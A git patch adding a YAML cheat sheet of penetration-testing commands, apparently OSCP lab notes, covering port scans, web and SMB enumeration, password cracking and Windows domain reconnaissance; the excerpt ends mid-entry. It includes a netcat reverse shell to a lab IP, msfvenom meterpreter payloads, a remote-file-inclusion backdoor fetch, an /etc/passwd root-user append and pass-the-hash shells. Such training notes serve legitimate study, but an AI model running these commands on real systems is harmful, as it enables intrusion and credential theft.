From 86a0027edb8100e6c488cad74d123dbe7722e0f4 Mon Sep 17 00:00:00 2001 From: ben Date: Sun, 11 Jan 2026 22:56:58 +0100 Subject: [PATCH] add data:x --- .gitignore | 4 +- data/commands.yaml | 2935 ++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 2938 insertions(+), 1 deletion(-) create mode 100644 data/commands.yaml diff --git a/.gitignore b/.gitignore index ac6d773..9fec4b2 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,3 @@ -data/commands.* \ No newline at end of file +data/commands.state +data/commands.raw +data/commands.tmp diff --git a/data/commands.yaml b/data/commands.yaml new file mode 100644 index 0000000..1edf8eb --- /dev/null +++ b/data/commands.yaml @@ -0,0 +1,2935 @@ +title: Commands for Fast Memo Shell +commands: + - cmd: nmap -p- --min-rate 10000 192.168.56.30 -Pn + lang: sh + tags: OSCP + desc: Fast scan all ports + - cmd: nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,5986,9389,49668,49670,49671,49673,49674,49687,49750 -sCV 192.168.56.30 -Pn + lang: sh + tags: OSCP + desc: Scan with services and versions + - cmd: sudo nmap -v -p- -sS -sV -A -T5 192.168.1.1 + lang: sh + tags: OSCP + desc: Syn TCP scan all ports with fingerprint, with fastest timming and verbose output + - cmd: grc nmap -v -p- -sV -A --min-rate 10000 --max-rtt-timeout 1500ms 192.168.229.201 + lang: sh + tags: OSCP + desc: TCP scan all ports with fingerprint fast with colors + - cmd: sudo nmap -sU -sV -A 192.168.203.199 + lang: sh + tags: OSCP + desc: UDP scan + - cmd: nmap -O -sV -A 192.168.203.199 + lang: sh + tags: OSCP + desc: TCP scan with OS fingerprint + - cmd: nmap -p- -sV -A --script "vuln" 192.168.213.188 + lang: sh + tags: OSCP + desc: TCP scan all ports and check for vuln + - cmd: nmap -sV -p 80,443 --script "vuln" 192.168.50.124 + lang: sh + tags: OSCP + desc: TCP scan HTTP/S and check for vuln + - cmd: nmap -p80,443 --script http-title 192.168.218.0/24 --open -Pn + lang: sh + tags: OSCP + desc: TCP scan HTTP/S and get page titles + - cmd: nmap -sT -A --top-ports=20 192.168.50.1-253 -oG top-port-sweep.txt + lang: sh + tags: OSCP + desc: TCP connect scan for the top 20 TCP ports + - cmd: nmap --script http-headers 192.168.50.6 + lang: sh + tags: OSCP + desc: scan and check headers with NSE scripts + - cmd: nmap --script-help http-headers + lang: sh + tags: OSCP + desc: get help about a NSE script + - cmd: rustscan --ulimit 5000 -a 10.129.102.178 -- -sV + lang: sh + tags: OSCP + desc: fast scan top ports with nmap service version + - cmd: rustscan --ulimit 5000 -a 10.129.102.178 -- -A -sC -sV + lang: sh + tags: OSCP + desc: fast scan top ports with nmap scripts + - cmd: rustscan --ulimit 5000 -a 10.129.102.178 + lang: sh + tags: OSCP + desc: fast scan top ports + - cmd: rustscan --ulimit 5000 -r 1-65535 -a 10.129.102.178 + lang: sh + tags: OSCP + desc: fast scan all ports + - cmd: naabu -host 192.168.214.149 + lang: sh + tags: OSCP + desc: fast scan a host + - cmd: naabu -nmap-cli 'nmap -sV' -host 192.168.214.149 + lang: sh + tags: OSCP + desc: fast scan a host and nmap service discovery + - cmd: naabu -nmap-cli 'nmap -sV -sC' -host 192.168.214.149 + lang: sh + tags: OSCP + desc: fast scan a host and nmap service discovery and scripts + - cmd: naabu -nmap-cli 'nmap -sV -sC' -port 1-65535 -host 192.168.214.149 + lang: sh + tags: OSCP + desc: fast scan a host of all ports + - cmd: naabu -nmap-cli 'nmap -sV -sC' -l ip_lists + lang: sh + tags: OSCP + desc: fast scan a list of hosts + - cmd: naabu -proxy 127.0.0.1:1080 -Pn -host 10.10.104.146 + lang: sh + tags: OSCP + desc: scan using proxy socks + - cmd: Invoke-WebRequest -Proxy "http://192.168.197.224:3128" -uri http://192.168.197.224:8000 -outfile test + lang: ps1 + tags: OSCP + desc: using proxy on windows + - cmd: find /usr/share/nmap/scripts/ -type f | sk --preview 'bat -l lua --color=always {}' + lang: sh + tags: OSCP + desc: search a NSE script + - cmd: nc -nvv -w 1 -z 192.168.50.152 3388-3390 + lang: sh + tags: OSCP + desc: TCP scan without nmap + - cmd: nc -nv -u -z -w 1 192.168.50.149 120-123 + lang: sh + tags: OSCP + desc: UDP scan without nmap + - cmd: nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152 + lang: sh + tags: OSCP + desc: SMB scan with info + - cmd: nmap -p 445 --script smb-os-discovery 192.168.212.0/24 --open -oG a; cat a | grep open | cut -d ' ' -f2 | tail -n +2 | xargs -I{} enum4linux {} + lang: sh + tags: OSCP + desc: SMB scan with info ip range + - cmd: sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt + lang: sh + tags: OSCP + desc: UDP scan ip range + - cmd: gobuster dir -u http:/// -w /usr/share/wordlists/dirb/common.txt -t 5 + lang: sh + tags: OSCP + desc: enumerate pages on webserver + - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://192.168.232.221/ -f + lang: sh + tags: OSCP + desc: bruteforce directory on webserver + - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -u http://192.168.232.221/ -x txt,html,php,asp,aspx,jsp + lang: sh + tags: OSCP + desc: bruteforce files on webserver + - cmd: feroxbuster --url http:/// + lang: sh + tags: OSCP + desc: enumerate pages on webserver + - cmd: feroxbuster --url http:/// -x pdf,php,txt + lang: sh + tags: OSCP + desc: enumerate pages on webserver (check for pdf, php, txt files) + - cmd: feroxbuster --url http://192.168.222.46 -w /usr/share/wordlists/dirb/common.txt + lang: sh + tags: OSCP + desc: enumerate pages on webserver using common list + - cmd: feroxbuster --url http://192.168.193.46/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt + lang: sh + tags: OSCP + desc: enumerate pages on webserver using very big list + - cmd: ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://192.168.240.46/FUZZ + lang: sh + tags: OSCP + desc: enumerate pages on webserver + - cmd: ffuf -w pins -u "http://10.129.95.191/cdn-cgi/login/admin.php?content=uploads" -b "user=FUZZ2; role=guest" -mc 200 + lang: sh + tags: OSCP + desc: Fuzz cookie value (bruteforce) + - cmd: gobuster vhost -u http:// -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt + lang: sh + tags: OSCP + desc: discover vhost (virtual host) + - cmd: wfuzz -c -f sub-fighter -u '' -H 'Host:FUZZ.' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt + lang: sh + tags: OSCP + desc: discover vhost (virtual host) + - cmd: wfuzz -c -f sub-fighter -u '' -H 'Host:FUZZ.' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw + lang: sh + tags: OSCP + desc: discover vhost (virtual host), get rid of non-existent false positives + - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -u http://192.168.1.10:8000/ [-f] + lang: sh + tags: OSCP + desc: discover directories + - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://192.168.1.10:8000/architecture/ + lang: sh + tags: OSCP + desc: discover commons files + - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_words.txt -u http://192.168.1.10:8000/architecture/ -x txt,html,php,asp,aspx,jsp + lang: sh + tags: OSCP + desc: discover files using extensions + - cmd: ~/hs/tools/enum4linux-ng.py 192.168.194.10 + lang: sh + tags: OSCP + desc: SMB enumeration + - cmd: rpcclient -U "MINILAB\\" 192.168.56.30 -N + lang: sh + tags: OSCP + desc: RPC enumeration (enumdomusers, enumdomgroups) + - cmd: net rpc group members 'Domain Users' -W 'MINILAB' -I '192.168.56.30' -U '%' + lang: sh + tags: OSCP + desc: Get all domain users + - cmd: nmap -Pn -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='minilab',userdb=/usr/share/seclists/Usernames/Names/names.txt" 192.168.56.30 + lang: sh + tags: OSCP + desc: Get all domain users, when anonymous sessions are not allowed + - cmd: smbmap -H 192.168.229.210 + lang: sh + tags: OSCP + desc: SMB list all shares with available permissions + - cmd: netexec smb 192.168.56.30 + lang: sh + tags: OSCP + desc: check SMB access + - cmd: netexec smb 192.168.56.30 -u bob -p 'superman' + lang: sh + tags: OSCP + desc: check SMB access with creds + - cmd: netexec smb 192.168.56.30 -u bob -p 'superman' --shares + lang: sh + tags: OSCP + desc: check SMB shares with creds + - cmd: netexec smb 192.168.56.30 -u bob -p 'superman' -M spider_plus + lang: sh + tags: OSCP + desc: check SMB shares with creds and try to find interesting files + - cmd: crackmapexec smb 192.168.56.30 -u 'a' -p '' --shares + lang: sh + tags: OSCP + desc: list guest access on shares + - cmd: smbclient --no-pass -L //192.168.194.10 + lang: sh + tags: OSCP + desc: list unprotected SMB shares + - cmd: smbclient --no-pass //192.168.194.10/offsec + lang: sh + tags: OSCP + desc: list under unprotected SMB share + - cmd: smbclient //192.168.50.195/share -c 'put config.Library-ms' + lang: sh + tags: oscp + desc: Uploading our Library file to the SMB share on the HR137 machine + - cmd: smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b + lang: sh + tags: OSCP + desc: Using smbclient with NTLM hash + - cmd: smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b ; dir ; get secrets.txt + lang: ps1 + tags: oscp + desc: Using smbclient with NTLM hash + - cmd: smbmap -u WEB02\mark -p OathDeeplyReprieve91 -H 192.168.246.248 + lang: sh + tags: OSCP + desc: SMB list all shares with available permissions + - cmd: impacket-smbclient WEB02\mark@192.168.246.248 [-hashes LMHASH:NTHASH] + lang: sh + tags: OSCP + desc: connect to smb share + - cmd: smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234 + lang: sh + tags: oscp + desc: Listing SMB shares through the SSH local port forward running on CONFLUENCE01. + - cmd: smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234 ; ls ; get Provisioning.ps1 + lang: sh + tags: oscp + desc: Listing files in the scripts share, using smbclient over our SSH local port forward running on CONFLUENCE01. + - cmd: proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234 + lang: sh + tags: oscp + desc: smbclient connecting to HRSHARES through the SOCKS proxy using Proxychains. + - cmd: smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234 + lang: sh + tags: oscp + desc: Connecting to the SMB share on HRSHARES, without any explicit forwarding. + - cmd: smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234 + lang: sh + tags: oscp + desc: Connecting to HRSHARES's SMB server through the dnscat2 port forward. + - cmd: sudo mount -t cifs //192.168.194.10/offsec /mnt/smb + lang: sh + tags: OSCP + desc: mount a SMB share + - cmd: sudo mount -t cifs //192.168.1.1/USB1 /mnt/livebox/ -o username=guest,password="",vers=1.0 + lang: sh + tags: OSCP + desc: mount a SMB share (guest) + - cmd: snmp-check 192.168.212.151 + lang: sh + tags: OSCP + desc: SNMP enumeration + - cmd: snmpwalk -Oa -c public -v1 -t 10 192.168.212.151 + lang: sh + tags: OSCP + desc: SNMP enumeration + - cmd: echo -e "public\nprivate\nmanager" > community + lang: sh + tags: OSCP + desc: SNMP enumeration generate community file + - cmd: for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips + lang: sh + tags: OSCP + desc: SNMP enumeration generate ip list file + - cmd: onesixtyone -c community -i ips + lang: sh + tags: OSCP + desc: SNMP enumeration + - cmd: snmpwalk -c public -v1 -t 10 192.168.50.151 + lang: sh + tags: OSCP + desc: SNMP enumeration + - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25 + lang: sh + tags: OSCP + desc: SNMP enumeration list entire MIB tree + - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2 + lang: sh + tags: OSCP + desc: SNMP enumeration list all the currently running processes + - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3 + lang: sh + tags: OSCP + desc: SNMP enumeration list all the current TCP listening ports + - cmd: snmpwalk -c public -v1 -t 10 192.168.244.149 NET-SNMP-EXTEND-MIB::nsExtendObjects + lang: sh + tags: OSCP + desc: SNMP enumeration of Extending Services + - cmd: apt-get install snmp-mibs-downloader; download-mibs + lang: sh + tags: OSCP + desc: update some MIBs to the latest version or to download extra vendor MIBs. + - cmd: impacket-mssqlclient -port 1433 -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.129.129.69 + lang: sh + tags: OSCP + desc: connect to a MSSQL Server + - cmd: curl "http://192.168.50.16/cgi-bin/../../../../etc/passwd" + lang: sh + tags: OSCP + desc: check Directory Traversals + - cmd: curl "http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + lang: sh + tags: OSCP + desc: check Directory Traversals + - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd" + lang: sh + tags: OSCP + desc: check Directory Traversals + - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log" + lang: sh + tags: OSCP + desc: check Local File Inclusion + - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php" + lang: sh + tags: OSCP + desc: check Local File Inclusion with PHP Wrappers + - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php" + lang: sh + tags: OSCP + desc: check Local File Inclusion with PHP Wrappers + - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain," + lang: sh + tags: OSCP + desc: check Local File Inclusion with PHP Wrappers + - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls" + lang: sh + tags: OSCP + desc: check Remote File Inclusion + - cmd: remmina -c rdp://username@server + lang: sh + tags: OSCP + desc: connect to a remote desktop in RDP + - cmd: nc -nvlp 4444 + lang: sh + tags: OSCP reverse-shell + desc: Bind netcat for reverse shell + - cmd: rlwrap -cAr nc -lnvp 443 + lang: sh + tags: OSCP + desc: Bind netcat for reverse shell with completion + - cmd: source ~/.virtualenvs/wsgidav/bin/activate + lang: sh + tags: COMMON + desc: use a python venv + - cmd: ~/hs/tools/powershell_base64_enc.sh + lang: sh + tags: OSCP + desc: encode a powershel payload in base64 + - cmd: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.157 4444 >/tmp/f + lang: sh + tags: OSCP reverse-shell + desc: bash reverse shell payload + - cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.165 LPORT=4445 -f exe-service > a.exe + lang: sh + tags: OSCP reverse-shell + desc: generate a windows service executable reverse shell + - cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.165 LPORT=4445 -f exe > a.exe + lang: sh + tags: OSCP reverse-shell + desc: generate a windows executable reverse shell + - cmd: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.45.204;set LPORT 443;run;" + lang: sh + tags: OSCP reverse-shell + desc: launch a meterpreter listener + - cmd: curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive + lang: sh + tags: OSCP + desc: Command injection POST command as data + - cmd: curl -s https://http.kali.org/README.mirrorlist | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep 'README$' | sort | uniq | xargs dirname | xargs -I {} sh -c 'echo $(curl -r 0-102400 -s -w %{speed_download} -o /dev/null {}/dists/kali-rolling/Contents-amd64.gz) {}' | sort -g -r + lang: sh + tags: OSCP + desc: List kali mirrors and speed sorted + - cmd: exiftool -a -u old.pdf + lang: sh + tags: OSCP + desc: Print all metadata from a file + - cmd: mysql -u root -p'root' -h 192.168.50.16 -P 3306 + lang: sh + tags: COMMON + desc: connect to mysql + - cmd: chezmoi git pull -- --autostash --rebase && chezmoi diff + lang: sh + tags: COMMON + desc: Pull the latest changes from your repo and see what would change, without actually applying the changes + - cmd: sudo setcap 'cap_net_bind_service=+ep' /usr/bin/python3.11 + lang: sh + tags: COMMON + desc: Allow bind for port < 1024, set capability CAP_NET_BIND_SERVICE + - cmd: /usr/bin/impacket-smbserver -smb2support share `pwd` + lang: sh + tags: OSCP CUSTOM + desc: 'share directory using SMB protocol, client cmd: net use z: \\ip\share' + - cmd: responder -I tap0 + lang: sh + tags: OSCP + desc: launch responder on interface tap0 + - cmd: sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp" + lang: sh + tags: OSCP + desc: use post.txt request file, "item" vulnerable item, with a custom writable dir + - cmd: sqlmap --flush-sessiony + lang: sh + tags: OSCP + desc: remove the previous session + - cmd: sudo grc tcpdump -l -n -i tun0 "dst net 192.168.45.152 && ((tcp[tcpflags] & (tcp-syn) != 0) || not tcp )" + lang: sh + tags: OSCP + desc: dump connection to current host (troubleshooting reverse shell) + - cmd: sudo grc tcpdump -X -vvv -l -n -i tun0 "dst net 192.168.45.152 && ((tcp[tcpflags] & (tcp-syn) != 0) || not tcp )" + lang: sh + tags: OSCP + desc: dump connection to current host with details (troubleshooting reverse shell) + - cmd: msfdb init + lang: sh + tags: OSCP + desc: init metasploit database + - cmd: hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force + lang: sh + tags: OSCP + desc: crack password using rules + - cmd: john --wordlist=ssh.passwords --rules=sshRules ssh.hash + lang: sh + tags: OSCP + desc: bruteForce Hash with John + - cmd: john --wordlist=/usr/share/wordlists/rockyou.txt --rules=sshRules -stdout > passwords.txt + lang: sh + tags: OSCP + desc: generate wordlist + - cmd: hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force + lang: sh + tags: OSCP + desc: bruteForce NTLM hash + - cmd: hashcat --help | grep -i "ntlm" + lang: sh + tags: OSCP + desc: search for hashcat hash code + - cmd: hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force + lang: sh + tags: OSCP + desc: bruteForce Net-NTLMv2 hash + - cmd: hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201 + lang: sh + tags: OSCP + desc: bruteforce SSH + - cmd: hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" + lang: sh + tags: OSCP + desc: bruteforce RDP + - cmd: hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.221.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Invalid username or password" + lang: sh + tags: OSCP + desc: bruteforce HTTP post + - cmd: hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.221.201 http-get / + lang: sh + tags: OSCP + desc: bruteforce HTTP auth basic + - cmd: legba ssh -T 192.168.195.153 -U usernames.txt -P passwords.txt + lang: sh + tags: OSCP + desc: bruteforce SSH + - cmd: legba rdp -T 192.168.244.191 -U users -P passwords + lang: sh + tags: OSCP + desc: bruteforce RDP + - cmd: nslookup mail.megacorptwo.com + lang: ps1 + tags: OSCP windows + desc: request DNS + - cmd: nslookup -type=TXT info.megacorptwo.com 192.168.50.151 + lang: sh + tags: OSCP + desc: request DNS sepecific type and resolver + - cmd: gobuster dir -u http://192.168.238.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern + lang: sh + tags: OSCP + desc: Enumerate API (pattern contain "v1 \n v2") + - cmd: echo 'MS01.oscp.exam' | gobuster vhost -w - -u http://192.168.194.147:8080 + lang: sh + tags: OSCP + desc: Check if vhost exist + - cmd: curl -A '' -H 'Host:' http:// + lang: sh + tags: OSCP + desc: Check if vhost exist + - cmd: find / -user root -perm -002 -type f -not -path "/proc/*" 2>/dev/null + lang: sh + tags: OSCP + desc: find root writables files + - cmd: routel + lang: sh + tags: OSCP + desc: list all routes + - cmd: ss -anp + lang: sh + tags: OSCP + desc: list all sockets + - cmd: ls -lah /etc/cron* + lang: sh + tags: OSCP + desc: list cron files + - cmd: find / -perm -u=s -type f 2>/dev/null + lang: sh + tags: OSCP + desc: find suid files + - cmd: grep "CRON" /var/log/syslog + lang: sh + tags: OSCP + desc: get cron logs + - cmd: echo "root2:$(openssl passwd w00t):0:0:root:/root:/bin/bash" >> /etc/passwd + lang: sh + tags: OSCP + desc: add a user root2 with password w00t + - cmd: /usr/sbin/getcap -r / 2>/dev/null + lang: sh + tags: OSCP + desc: recursive search / for binaries with capabilities. + - cmd: whatweb http://192.168.203.48/ + lang: sh + tags: OSCP + desc: check server and framework used by a website + - cmd: searchsploit "HTML Injection exploit WebCT" + lang: sh + tags: OSCP + desc: search a exploit + - cmd: searchsploit -m + lang: sh + tags: OSCP + desc: download a exploit + - cmd: impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b + lang: sh + tags: OSCP + desc: Using psexec to get an interactive shell + - cmd: impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b + lang: sh + tags: OSCP + desc: Using wmiexec to get an interactive shell + - cmd: xfreerdp /u:stephanie /d:corp.com /p:'LegmanTeamBenzoin!!' /cert-ignore /v:192.168.197.75 +clipboard /dynamic-resolution /drive:~/vmshare,vmshare + lang: sh + tags: OSCP + desc: connect to rdp + - cmd: xfreerdp /u:offsec /p:'lab' /cert-ignore /v:192.168.197.75 +clipboard /dynamic-resolution + lang: sh + tags: OSCP + desc: connect to rdp + - cmd: swaks --from administrator@supermagicorg.com --to dave.wizard@supermagicorg.com --server 192.168.194.199:587 --auth-user test@supermagicorg.com --auth-pass test --body @msg.txt --attach @config.Library-ms + lang: sh + tags: OSCP + desc: send a email + - cmd: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/oscp/webdav/ + lang: sh + tags: OSCP + desc: launch webdav server + - cmd: socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432 + lang: sh + tags: OSCP + desc: redirect a port and debug + - cmd: socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22 + lang: sh + tags: OSCP + desc: redirect a port + - cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' + lang: sh + tags: OSCP + desc: enable console ssh interaction in netcat shell + - cmd: plink.exe -ssh -l kali -pw -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4 + lang: ps1 + tags: OSCP Windows + desc: port redirect using plink + - cmd: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.232.64 connectport=22 connectaddress=10.4.232.215 + lang: ps1 + tags: OSCP + desc: add port redirect using netsh + - cmd: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.232.64 localport=2222 action=allow + lang: sh + tags: OSCP + desc: add firewall rule using netsh + - cmd: netsh advfirewall firewall delete rule name="port_forward_ssh_2222" + lang: sh + tags: OSCP + desc: delete firewall rule using netsh + - cmd: netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.232.64 + lang: sh + tags: OSCP + desc: delete port redirect using netsh + - cmd: 'alias issh=ssh -o LogLevel=ERROR -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no"' + lang: sh + tags: OSCP + desc: SSH without fingerprint + - cmd: powershell -ep bypass + lang: ps1 + tags: OSCP Windows winsetup + desc: bypass the execution policy + - cmd: icacls + lang: ps1 + tags: OSCP Windows + desc: discretionary access control lists (DACLs) on specified files + - cmd: whoami + lang: ps1 + tags: OSCP Windows + desc: obtain username and hostname + - cmd: whoami /groups + lang: ps1 + tags: OSCP Windows + desc: Group memberships of the user + - cmd: Get-LocalUser + lang: ps1 + tags: OSCP Windows + desc: Display local users (depuis powershell) + - cmd: Get-LocalGroup + lang: ps1 + tags: OSCP Windows + desc: Display local groups (depuis powershell) + - cmd: Get-LocalGroupMember adminteam + lang: ps1 + tags: OSCP Windows + desc: Display members of the group + - cmd: systeminfo + lang: ps1 + tags: OSCP Windows + desc: Information about the operating system and architecture + - cmd: ipconfig /all + lang: ps1 + tags: OSCP Windows + desc: Information about the network configuration + - cmd: netstat -ano + lang: ps1 + tags: OSCP Windows + desc: Active network connections + - cmd: Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname + lang: ps1 + tags: OSCP Windows + desc: Installed applications + - cmd: Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname + lang: ps1 + tags: OSCP + desc: Installed applications + - cmd: Get-Process + lang: ps1 + tags: OSCP + desc: Running processes + - cmd: Get-Process | Select-Object -ExpandProperty Path + lang: ps1 + tags: OSCP + desc: Running processes with path + - cmd: Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue + lang: ps1 + tags: OSCP + desc: Find in powershell + - cmd: Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue + lang: ps1 + tags: OSCP + desc: Find in powershell + - cmd: dir -Recurse | Select-String -pattern "steve" + lang: ps1 + tags: OSCP + desc: recusrive grep + - cmd: net user steve + lang: ps1 + tags: OSCP + desc: Get info about account + - cmd: Get-History + lang: ps1 + tags: OSCP + desc: Get powershell history commands + - cmd: Clear-History + lang: ps1 + tags: OSCP + desc: Clear powershell history commands + - cmd: (Get-PSReadlineOption).HistorySavePath + lang: ps1 + tags: OSCP + desc: Display path of the history file from PSReadline (then type to read) + - cmd: eventvwr + lang: ps1 + tags: OSCP + desc: Launch event viewer + - cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} + lang: ps1 + tags: OSCP + desc: List of services with binary path + - cmd: Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'} + lang: ps1 + tags: OSCP + desc: Obtain Startup Type for mysql service + - cmd: whoami /priv + lang: ps1 + tags: OSCP + desc: Checking for reboot privileges + - cmd: shutdown /r /t 0 + lang: ps1 + tags: OSCP + desc: Reboot + - cmd: Restart-Service BetaService + lang: ps1 + tags: OSCP + desc: Restarting BetaService + - cmd: $env:path + lang: ps1 + tags: OSCP + desc: Display the PATH environment variable + - cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName + lang: ps1 + tags: OSCP + desc: List of services with binary path + - cmd: wmic service get name,pathname | findstr .. (look in courses) + lang: ps1 + tags: OSCP + desc: List of services with spaces and missing quotes in the binary path + - cmd: schtasks /query /fo LIST /v + lang: ps1 + tags: OSCP + desc: list scheduled tasks + - cmd: vim --clean + lang: sh + tags: COMMON + desc: launch vim without options and config files + - cmd: git --git-dir=~/fms/.git --work-tree=~/fms pull + lang: sh + tags: COMMON + desc: git command (pull) with directory as params + - cmd: pandoc -f epub -t markdown_strict -o hacktricks.md hacktricks.epub + lang: sh + tags: COMMON + desc: convert files from format to another, here epub to markdown + - cmd: grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" + lang: sh + tags: COMMON + desc: grep ip address + - cmd: grep -E -o "[[:alnum:]]{30,34}" + lang: sh + tags: COMMON + desc: grep NTLM hash + - cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 + lang: sh + tags: COMMON + desc: launch mitmproxy with options + - cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 -s ~/hs/mitmproxy/req_hook.py + lang: sh + tags: COMMON + desc: launch mitmproxy with options and hook + - cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 --mode upstream:http://127.0.0.1:8888 + lang: sh + tags: COMMON + desc: launch mitmproxy with upstream proxy + - cmd: find / -xdev -type f \( -exec grep -xq "{}" /var/lib/dpkg/info/*.list \; -or -print \) + lang: sh + tags: COMMON + desc: search for files not owned by any package + - cmd: secret-tool search key password + lang: sh + tags: COMMON + desc: search password saved in gnome keyring + - cmd: Set-WinUserLanguageList -Force 'fr-FR' + lang: ps1 + tags: COMMON powershell winsetup + desc: change Keyboard Layout in French + - cmd: Test-NetConnection -Port 445 192.168.50.151 + lang: ps1 + tags: OSCP powershell + desc: Check for TCP port open + - cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null + lang: ps1 + tags: OSCP powershell + desc: TCP scan port + - cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).ConnectAsync("192.168.50.151", $_).Wait(100)) "TCP port $_ is open"} 2>$null + lang: ps1 + tags: OSCP powershell + desc: TCP scan port display only open + - cmd: '(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell' + lang: ps1 + tags: OSCP powershell windows cmd.exe + desc: check the current shell + - cmd: powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe + lang: ps1 + tags: OSCP powershell windows cmd.exe + desc: download a file + - cmd: net view \\dc01 /all + lang: ps1 + tags: OSCP windows cmd.exe + desc: Show SMB share + - cmd: ls -l /usr/share/metasploit-framework/scripts/resource + lang: sh + tags: OSCP + desc: list Meterpreter autoscript examples + - cmd: net user jeffadmin /domain + lang: ps1 + tags: OSCP powershell windows cmd.exe + desc: get information about a user and domain + - cmd: net group /domain + lang: ps1 + tags: OSCP powershell windows cmd.exe + desc: output includes a long list of groups in the domain + - cmd: net group "sales department" /domain + lang: ps1 + tags: oscp powershell windows cmd.exe + desc: enumerate the group members + - cmd: cd c:\Tools + lang: ps1 + tags: oscp powershell windows winsetup + desc: go to tools directory + - cmd: Import-Module .\PowerView.ps1 + lang: ps1 + tags: oscp powershell windows winsetup + desc: import the module PowerView + - cmd: Import-Module .\Sharphound.ps1 + lang: ps1 + tags: oscp powershell windows winsetup + desc: import the module SharpHound + - cmd: Get-NetDomain + lang: ps1 + tags: oscp powershell windows PowerView + desc: get basic information about the domain + - cmd: 